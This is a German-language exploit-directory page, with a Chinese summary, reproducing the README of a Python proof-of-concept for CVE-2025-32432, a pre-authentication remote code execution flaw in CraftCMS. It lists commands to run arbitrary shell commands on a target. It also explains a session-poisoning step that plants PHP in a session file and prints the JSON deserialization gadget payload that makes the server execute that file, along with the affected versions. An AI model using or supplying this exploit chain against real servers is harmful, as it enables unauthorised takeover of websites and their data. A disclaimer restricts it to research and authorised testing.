Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32432-PoC — Python-Exploit für CVE-2025-32432, eine Pre-Auth-RCE im CraftCMS-Asset-Transform-Endpunkt. Enthält eine Zwei-Paket-Kette, um beliebige Shell-Befehle über Deserialisierungs-Gadgets auszuführen. | Kitploit
Tools/GitHubGitHub/cty-research-1/cve-2025-32432-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Python-Exploit für CVE-2025-32432, eine Pre-Auth-RCE im CraftCMS-Asset-Transform-Endpunkt. Enthält eine Zwei-Paket-Kette, um beliebige Shell-Befehle über Deserialisierungs-Gadgets auszuführen.

Repository anzeigen
641vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32432 Exploit-Skripte (Python PoC)

Pre-Auth Remote Code Execution für CraftCMS 3.x / 4.x / 5.x
PoC-Maintainer: C.T.Y. (nur zu Forschungszwecken)
Schwachstellenentdeckung: Nicolas Bourras – Orange Cyberdefense
Zusätzliche PoC-Inspiration: SensePost-Forschung & Chirag Artanis öffentliches Skript


1. Übersicht

Dieses Repository bündelt zwei sich ergänzende Python-Exploits für CVE-2025-32432 – eine Pre-Authentifizierungs-RCE im Asset-Transform-Endpunkt von CraftCMS.

SkriptZweck
craftcms_rce_php_check.pySicherheitssonde – sendet eine Anfrage mithilfe des FnStream-Gadgets, um zu prüfen, ob beliebiger PHP-Code ausgeführt wird (gibt phpinfo() aus). Ideal für eine risikoarme Bestätigung.
craftcms_final_payload.pyVollständiger Exploit – Zwei-Paket-Kette: Zuerst PHP via FnStream einschleusen, dann mit dem FieldLayoutBehavior → PhpManager-Gadget jeden Shell-Befehl ausführen.

Das zweite Skript ist das in dieser README beschriebene.
Das erste Skript dient der Vollständigkeit und schnellen Validierung, mit freundlicher Genehmigung von Chirag Artani – siehe Danksagungen.
Der Dateiname wurde zur Klarheit angepasst; die ursprüngliche Struktur und Idee stammen von Chirag Artani.


2. Haftungsausschluss 🚨

Nur für Bildungszwecke & autorisierte Sicherheitstests.
Die Verwendung dieser Skripte gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal und unethisch.


3. Funktionen (endgültiges Payload)

  • Ein-Schuss-Zwei-Paket-RCE
  • Automatisches assetId-Brute-Force (404 → 302-Heuristik)
  • Benutzerdefinierte Shell-Befehlausführung (-c/--cmd)
  • Funktioniert über HTTP oder HTTPS (SSL-Überprüfungswarnungen unterdrückt)
  • Saubere Extraktion der Befehlsausgabe aus der HTML-Antwort

4. Anforderungen

  • Python 3.8+
  • PyPI-Pakete (Installation mit pip install -r requirements.txt):
    • requests
    • urllib3

5. Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Abhängigkeiten installieren
pip install -r requirements.txt

6. Verwendung

6.1 Schnelle PHP-Ausführungsprüfung

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://opfer.com

Wenn Sie die phpinfo()-Ausgabe sehen, ist das Ziel mit hoher Wahrscheinlichkeit ausnutzbar.

6.2 Vollständiger Zwei-Paket-Exploit

root@kitploit:~
python3 craftcms_final_payload.py -u https://opfer.com -c "id"

Optionen

OptionLange FormBeschreibungErforderlich
-u--urlBasis-URL des Ziels (ohne abschließenden Schrägstrich)✅
-c--cmdAuszuführender Shell-Befehl✅
-a--assetBekannter gültiger assetId❌
-s--scan-maxBrute-Force-Grenzwert (Standard: 300)❌

7. Wie die Schwachstelle funktioniert (Zusammenfassung)

  • Session Poisoning – GET auf /index.php?p=admin/dashboard&a=<?=...?> schreibt beliebiges PHP in /tmp/sess_<ID>.
  • Deserialisierungs-Gadget – POST auf actions/assets/generate-transform mit einem FieldLayoutBehavior → PhpManager-Gadget zwingt CraftCMS, die Session-Datei mit require() einzubinden und den Code auszuführen.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. Getestete Versionen

  • CraftCMS < 3.9.15 (erfordert assetId-Brute-Force)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. Referenzen & Weiterführende Literatur

  • Ursprüngliche Meldung – Nicolas Bourras / Orange Cyberdefense
  • SensePost Deep-Dive-Blog
  • Chirag Artanis PoC
  • CraftCMS Security Advisory
  • CVE-2025-32432 @ MITRE

10. Danksagungen

  • C.T.Y. – Vollständiger Zwei-Paket-PoC & Dokumentation
  • Chirag Artani – Ursprüngliches phpinfo-Prüfskript (craftcms_rce_php_check.py) und frühe Forschungsideen Der Dateiname wurde zur Klarheit angepasst; die ursprüngliche Struktur und Idee stammen von Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense – Schwachstellenentdeckung und verantwortungsvolle Offenlegung
  • Zusätzliche Erkenntnisse vom SensePost-Forschungsteam

11. Lizenz

Verantwortungshinweis: Alle rechtlichen Risiken oder Schäden, die aus der Nutzung dieses Codes entstehen, liegen in der alleinigen Verantwortung des Nutzers.

MIT-Lizenz – siehe LICENSE.


中文說明

1. 專案內容

檔案用途
craftcms_rce_php_check.pyPHP 執行可行性檢查:單一請求,使用 FnStream 觸發 phpinfo(),以低影響方式驗證目標是否易受攻擊。
此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
craftcms_final_payload.py兩包鏈完整利用:先以 FnStream 植入 PHP,再透過 PhpManager 執行任意指令。

2. 免責聲明

僅供教學與合法授權測試使用。未經授權操作即屬違法。


3. 快速檢查

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://目標站

4. 完整利用

root@kitploit:~
python3 craftcms_final_payload.py -u https://目標站 -c "id"

參數與英文版相同。


5. 致謝

  • Chirag Artani — phpinfo 檢查腳本 此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。
  • Nicolas Bourras / Orange Cyberdefense — 漏洞發現與技術靈感
  • SensePost — 技術靈感

6. 授權

使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。

MIT License

Tool herunterladen